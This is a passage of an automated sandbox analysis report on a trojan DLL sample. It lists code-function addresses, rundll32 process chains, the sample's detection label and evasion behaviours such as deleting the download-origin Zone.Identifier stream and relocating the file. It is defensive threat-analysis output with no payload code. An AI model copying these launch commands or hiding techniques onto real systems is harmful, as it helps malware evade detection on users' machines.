                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035B7445
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035AFA78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A387F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035BB677
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A6869
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A3A6C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035AEE60
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035AB464
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035C261E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A800A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035BC205
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A243F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A3432
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A3228
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035B282D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A9824
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035C1CDB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035B52D1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A90D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035B28D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035C20CE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035B10CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A2CC2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A92C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A46FA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A1EFB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035B40FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A84F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035B62F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035B4CF5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035AC0EA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035B56E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A40E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035BA29B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035B009A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035BE899
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035AFE9D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035B0A93
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035BCE90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035B0E97
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035AF48A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035AA083
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009BA29B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B009A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009BCE90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009C1291
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009AF48A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B28D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009C20CE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B10CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A2CC2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A9824
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009AAA4E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009AAE43
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B7445
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009AEE60
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B3782
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A4B81
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B89A2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009BEDED
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B3D0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009BBF0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009AF73B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009C0370
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009ACF6E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009BE899
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009AFE9D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B0A93
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B0E97
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009AA083
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009C1CDB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B52D1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A90D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A92C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A46FA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A1EFB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B40FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A84F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B62F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B4CF5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009AC0EA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B56E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A40E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009C261E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A800A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009BC205
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A243F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A3432
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A3228
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B282D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009ACE5A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A6453
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009BEA55
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A544C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B3043
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009AFA78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A387F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009BB677
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A6869
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A3A6C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009AB464
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B1591
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009AB191
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A7795
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A358B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A8D80
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009BDB87
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B85B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A43BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A59BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009BD7BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009BE3B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009BE5A7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009BDDA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B0BA4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A75D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A19C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A51EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009AA3E7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A4D1E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009ACB13
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B970A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009BE10A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B590E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009BCD35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009AA92F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B9124
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B6540
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009ABD61
                      Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6ECD1DE0 appears 97 times
                      Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6ECEAC90 appears 33 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6ECD1DE0 appears 97 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6ECEAC90 appears 33 times
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 98%
                      Source: efELSMI5R4.dllVirustotal: Detection: 19%
                      Source: efELSMI5R4.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll"
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\efELSMI5R4.dll,Control_RunDLL
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\efELSMI5R4.dll,ajkaibu
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\efELSMI5R4.dll,akyncbgollmj
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bbinmhqtvqxlwm\fxpdqqlt.pee",NbYKKsmYIJwkXu
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",Control_RunDLL
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 168 -p 6404 -ip 6404
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",Control_RunDLL
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6404 -s 308
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 6404 -ip 6404
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6404 -s 316
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Bbinmhqtvqxlwm\fxpdqqlt.pee",Control_RunDLL
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\efELSMI5R4.dll,Control_RunDLL
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\efELSMI5R4.dll,ajkaibu
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\efELSMI5R4.dll,akyncbgollmj
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bbinmhqtvqxlwm\fxpdqqlt.pee",NbYKKsmYIJwkXu
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Bbinmhqtvqxlwm\fxpdqqlt.pee",Control_RunDLL
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 168 -p 6404 -ip 6404
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6404 -s 308
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 6404 -ip 6404
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6404 -s 316
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etlJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER2267.tmpJump to behavior
                      Source: classification engineClassification label: mal88.troj.evad.winDLL@41/21@0/1
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009C1B99 CreateToolhelp32Snapshot,
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\efELSMI5R4.dll,Control_RunDLL
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:204:64:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6736:120:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:5604:64:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6404
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: efELSMI5R4.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: efELSMI5R4.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000016.00000003.582794929.000000000058C000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.583003342.0000000000553000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.582874162.0000000000553000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.582894630.0000000000559000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.582878740.0000000000559000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000016.00000003.582894630.0000000000559000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.582878740.0000000000559000.00000004.00000001.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000016.00000003.583003342.0000000000553000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.582874162.0000000000553000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.582869667.000000000054D000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.583186515.000000000054D000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.604642586.0000000000CAC000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.604322551.0000000000CAC000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdbk source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000016.00000002.597098712.0000000000432000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000016.00000003.582869667.000000000054D000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.583186515.000000000054D000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.604642586.0000000000CAC000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.604322551.0000000000CAC000.00000004.00000001.sdmp
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011013E7 push esi; retf
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECF6A93 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008613E7 push esi; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6ECF6A93 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007713E7 push esi; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A13E7 push esi; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A13E7 push esi; retf
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECDE690 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,CreateMutexA,CloseHandle,ReleaseMutex,
                      Source: C:\Windows\SysWOW64\rundll32.exePE file moved: C:\Windows\SysWOW64\Bbinmhqtvqxlwm\fxpdqqlt.peeJump to behavior

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Bbinmhqtvqxlwm\fxpdqqlt.pee:Zone.Identifier read attributes | delete
                      Source: C:\Windows\System32\svchost.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
